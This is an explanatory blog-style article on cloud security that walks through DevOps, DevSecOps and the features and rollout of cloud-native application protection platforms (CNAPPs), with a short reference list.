Cybersecurity and the State of the Modern Threat Landscape: A Deep Dive on CNAPPs

Cybersecurity and the State of the Modern Threat Landscape: A Deep Dive on CNAPPs

Introduction

Over time, and as more organizations transition to the cloud, there is an imperative need to explore robust cloud security solutions to keep abreast with the ever-evolving security threat landscape. Further, according to a report by Gartner, Inc. in August 2021 on Innovation Insight for Cloud-Native Application Protection Platforms, many organizations have resolved to manually piece together various DevSecOps tools to achieve a holistic view of their infrastructure and associated application risks. As the cloud security landscape continues to evolve, security professionals are consistently developing innovative solutions and strategies around the mitigation of advanced tactics employed by cyber criminals. There is thus an ever-glowing necessity to develop and continuously improve these security solutions to anticipate potential attack and exploitation methods to stay in the clear. One of the significant efforts around these initiatives is the emergence of cloud-native application protection platforms. We will now explore the background and various aspects of this trend and what it means for different organizations in this space.

Cloud Computing Adoption

Cloud computing is the delivery of computing services via the internet to facilitate faster innovation, resource flexibility, and economies of scale. Cloud computing resources are typically offered on a pay-as-you-go basis ensuring that you only pay for the services that you consume thus lowering operating costs while simultaneously guaranteeing efficiency while running your infrastructure and seamless scaling as your business needs change.

Cloud computing resources include servers, databases, storage, networking, software, business analytics, and intelligence. Cloud services can be deployed on public clouds, private clouds, or hybrid clouds.

Cloud security is increasingly becoming a huge concern and top priority to several organizations, particularly those running hybrid or multi-cloud environments. There is an exponential adoption of cloud platforms by organizations to execute their mission-critical workloads due to the flexibility and efficiency afforded by the cloud as opposed to traditional on-premises data centers.

Security breaches and malicious attacks on the cloud are also growing in an equal manner if not more and threat vectors are evolving every day. It is only imperative that businesses evaluate and understand key security constructs on the cloud to effectively implement the right tools and best security practices to protect the hosted workloads and to mature these practices over time.

DevOps and DevSecOps Overview

Contrary to popular belief, DevOps is not a technology but a methodology for improving work throughout the software development lifecycle by promoting better communication and synergy between teams. DevOps represents a collaboration or shared approach to the tasks executed by an organization’s application development and IT operations teams.

One of the most popular DevOps methodologies is Continuous Integration, Continuous Delivery, or Continuous Deployment (CI/CD). Continuous Integration (CI) is the practice of regularly and consistently integrating all code changes into the main code branch, automatically testing the changes, and automatically initiating a build. Continuous Delivery (CD) works together with Continuous Integration (CI) to automate infrastructure provisioning and application release processes. The DevOps lifecycle encompasses all states from the initiation of the software development process to delivery, maintenance, and security.

Some of the most critical stages of the DevOps lifecycle include planning and organization of the work to be done, designing and developing code, testing and verification, packaging applications and dependencies, vulnerability management, release management, infrastructure configuration, and performance monitoring post-deployment.

With security as an integral part of the software development lifecycle, security testing processes must come earlier in the development process. This is significant in speeding up development while improving code quality.

DevSecOps ensures that DevOps teams appreciate and understand the security and compliance implications and requirements from the very project initiation to properly safeguard software integrity. DevSecOps can be implemented in various environments such as on-premises, cloud-native, or even in hybrid setups.

Through seamless integration of security into DevOps workflows, organizations can effectively achieve visibility and risk control needs necessary to meet complex security demands.

A comparison of DevOps and DevSecOps using Venn diagrams. The DevOps diagram shows the intersection of Development, IT Operations, and Application Delivery. The DevSecOps diagram adds Security to the mix, showing the intersection of Development, IT Operations, Application Delivery, and Security.

DevSecOps Lifecycle

Plan - Involves conducting security analysis and developing a plan outlining where, when, and how security testing will be conducted. Collaborative design tools such as IriusRisk can be leveraged for threat modelling.

Build - As developers progressively add code to the central source repository, DevSecOps build technologies can be utilized to automate the security examination of the build output (artifacts). Some of the most essential security approaches here include software component analysis, Static Application Software Testing (SAST), and unit tests. These tools are built and integrated into the existing DevOps CI/CD pipelines. It is also essential to review and scan third-party code dependencies for vulnerabilities during this stage.

Additionally, some code-centric tools are critical in assisting developers write better and more secure code. These tools are useful in static code analysis, code reviews, and pre-commit hooks procedures. Moreover, further secure technologies can be integrated into the developers’ Git workflows to trigger security tests or reviews for every commit and merge. Some of the most popular tools here are CheckMarx, SonarQube, and Snyk.

DevOps and Cloud-Native Approach

As more and more organizations are adopting cloud-native computing, there are growing advantages of moving software development to the cloud. Some of the greatest advantages of building, testing, and deploying software on the cloud include significant cost savings, faster software shipping as well as promoting productivity by freeing DevOps teams to innovate rather than focus on maintaining infrastructure. Therefore cloud-native application development is increasingly becoming the preferred approach due to more effective collaboration between DevOps teams.

Cloud-Native Applications

Cloud-native applications are typically architected as loosely coupled microservices that usually interact with each other via Application Programming Interfaces (APIs). These applications are usually developed via DevSecOps methodologies incorporating Continuous Integration and Continuous Delivery pipelines.

Most of these applications largely leverage open-sourced code and libraries and are containerized and orchestrated using platforms like Kubernetes. Once containerized, these applications are deployed onto programmatic cloud infrastructure and are frequently updated and managed with a bias toward immutability to discourage unnecessary changes to production workloads.

Cloud-Native Application Protection Platforms (CNAPPs)

Traditionally, comprehensively securing cloud-native applications called for disparate tools from multiple vendors that were poorly integrated and were largely biased towards cybersecurity professionals with little regard for other DevOps teams.

Consequently, there was limited context during risk prioritization and remediation leading to poor productivity on DevOps teams. Cloud Native Application Protection Platforms seek to address this challenge by synergizing and collaboratively putting DevOps teams at the very core of application risk management.

By using a consolidated platform, there are greater visibility levels from runtime that can then be used to feedback on the development. Conversely, the improved visibility from development can be leveraged to strengthen runtime protection.

In its simplest form, a CNAPP is a comprehensive software platform that simplifies monitoring, detection, and response to potential cloud security threats and vulnerabilities. CNAPPs achieve this by seamlessly integrating multiple disparate security protection capabilities into a single platform that can then identify, prioritize, promote collaboration, and facilitate remediation of risks cutting across the complex logical boundary of modern cloud-native applications.

CNAPPs enable various organizations to adopt DevSecOps to protect business-critical workloads and streamline operations. By consolidating multiple security capabilities in a single platform, CNAPPs yield overall visibility into potential risks linked to the deployed cloud infrastructure thus enabling security teams to quantify and proactively respond to various risks in the environment.

CNAPPs also mitigate the inherent human error related to managing multiple tools and software by eliminating the need to exchange information between disparate platforms by consolidating security assessment, threat detection, and reporting. Furthermore, by integrating a CNAPP into the DevOps CI/CD tasks, Infrastructure-as-Code (IaC) vulnerabilities can be identified and mitigated ahead of time and therefore prevent insecure deployments to the cloud.

CNAPP Capabilities and Coverage

Even though almost all CNAPP solutions provide multiple cloud security tools, most of the features and capabilities are vendor centric. The most common CNAPP features include:

Infrastructure-as-Code Scanning (IaC) - IaC tools allow for defining cloud architecture and services programmatically or using configuration files. IaC tooling automates these processes to mitigate misconfiguration risks. IaC scanning tools can evaluate these configurations to surface vulnerabilities and other misconfigurations for proactive remediation.

Cloud Infrastructure Entitlement Management (CIEM) - Identity management is critical across cloud environments. CIEM interrogates your cloud infrastructure configurations to unearth and alert you on unnecessary or misconfigured access to resources. Through detection and reporting on secure access misconfigurations on the cloud, CIEM facilitates enforcement of the principle of the least privilege access to critical resources.

Cloud Security Posture Management (CPSM) - The primary goal of CPSM is to mitigate misconfigurations to prevent them from propagating to production environments. CPSM not only guarantees visibility and alerting but also offers guided or automated remediation to address the identified security deficiencies and promote an overall solid security posture. CPSM assesses your cloud estate against predefined rules to identify instances of misconfigurations and further enforces compliance through the built-in customized industry standards and frameworks. CPSM can also be integrated into the DevOps CI/CD pipelines to enforce compliance with existing cloud identity and access management policies for new IaC configurations.

Cloud Workload Protection Platform (CWPP) - Cloud workloads are services such as containers, VMs, databases, APIs, serverless functions, and orchestration platforms like Kubernetes. CWPPs offer visibility into your cloud workloads, detect underlying vulnerabilities and misconfigurations, and recommend corrective actions to mitigate risks and threats in production.

Data Security Posture Management (DSPM) - DPSM offers protection against sensitive data residing in cloud environments. Through proper identification, visibility, and correlation of sensitive data against known risk factors, DPSM can then understand data asset configurations, usages, and movement and can even surface attack paths on the data and consequently allow proactive mitigation of identified issues.

Kubernetes Security Posture Management (KSPM) - Kubernetes automates software deployments, scaling, and management of containerized applications. KPSM tools provide holistic security visibility into containers, clusters, and associated hosts by scanning Kubernetes environments to detect and report on security vulnerabilities and misconfigurations. KPSM further ensures that Kubernetes security issues are proactively surfaced during the early phases of software development and mitigated promptly.

Cloud Service Network Security (CSNS) - CNSS tools offer real-time proactive protections for your cloud infrastructure. CNSS is a suite of tools such as Web Application Firewalls (WAF), Web Application and API Protection (WAAP), Anti-DDOS solutions, TLS examiners, and more.

Cloud Detection and Response (CDR) - CDR enables real-time security monitoring within the cloud to detect and surface potential security issues and suspicious events. Some of the critical security events surfaced by CDR include remote code executions, crypto-mining operations, privilege escalation, malware, container escape, and more. The CDR is also able to effectively correlate threats by leveraging real-time signals, activity, and logs to track adversary movements such that the resultant actionable insights can enable rapid response and mitigate potential impact.

Below is a depiction of the evolution of the CNAPP risk landscape and the explosion of the risk surface area for cloud-native applications.

Developers are increasingly building more software and cloud infrastructure and leveraging Infrastructure-as-Code to set up infrastructure confounding the existing security situation. Therefore, there is an increasing need to shift left into the development lifecycle to surface and act on security issues much earlier in the development pipeline as new artifacts are created. Achieving a truly comprehensive and robust CNAPP platform requires a combination of runtime risk visibility, cloud risk visibility, and development artifact risk visibility.

CNAPPs Deployment Approach

Strategic planning before the deployment of a CNAPP solution should focus on enhancing the developers’ experience as the primary goal. This should serve to reduce operational friction, promote better risk identification, and minimize false positives.

Remember that since the developers are the ultimate resource that will be involved in the remediation of the surfaced risks, the CNAPP evaluation team should include adequate representation from the DevOps side knowledgeable on cloud security, container security, and application security.

As you choose your preferred CNAPP solution, there is no single vendor who is the best breed in all the desired CNAPP capabilities. Choose a CNAPP solution vendor with a holistic understanding of the relationships between the different elements of a cloud-native application and the associated risks. This is critical for the embodiment of the combined cloud control plane risks and artifact risks to understand, prioritize, and remediate the overall risk surface of the system. This should then be followed by executing a thorough proof of concept jointly with the developers and using real applications before making the final decision and commitment to the chosen CNAPP vendor.

During the CNAPP rollout, the immediate focus should be afforded to the cloud-native applications first since this is where development is fast-paced, and risk identification is critical. Where deployment of the full CNAPP capabilities is not possible, it’s essential to prioritize the CPSM capability which effectively identifies most misconfigurations on cloud-native applications.

The most common risk source for cloud-native applications resides in the software composition, leveraged Open-Source Software Libraries, dependencies, containers, secrets, and access management loopholes. Security analysis for these should be prioritized.

Finally, adopt a practical approach when deploying a CNAPP. For instance, agent-based deployment has better visibility but may not be always possible. In such scenarios, agentless deployment should be considered to achieve runtime visibility.

The Future of CNAPPs

For a CNAPP solution to effectively deliver against the vision of RiskOPs, a deeper understanding of the relationships between the different elements of cloud-native applications is paramount. CNAPPs must be able to model application code, libraries, containers, scripts, configuration, and vulnerabilities to discover where major risks reside.

Most vendors are increasingly focusing on identifying the relationship between development tools, developers, and artifacts they create. Some offer an intelligent risk-based approach to software composition analysis or application posture management. Others offer to deduplicate risk findings of multiple security and risk scanners to prioritize remediation efforts.

All in all, most of these vendors are not full CNAPP providers but over time, more capabilities will be adopted by larger CNAPP offerings. Currently, security teams have limited ways to assess the overall security posture of the protected information estate. As time goes by, CNAPPs will eventually become the standard way for development and security teams to sync on the security front. This will enable developers and cloud teams to visualize security differently and adopt the right steps to secure their applications and resources.

In conclusion, it is the responsibility of the organization to adopt a solid security strategy for adequate planning to ensure the choice of a CNAPP solution adequately addresses the needs and the drive for exploring such solutions.

References

https://www.wiz.io/academy/what-is-a-cloud-native-application-protection-platform-cnapp

https://www.techtarget.com/searchitoperations/definition/DevOps

https://about.gitlab.com/topics/devops/

crowdstrike.com/cybersecurity-101/cloud-sec..

https://www.gartner.com

Images Source: Gartner, Author (Too bad couldn't caption with hashnode!)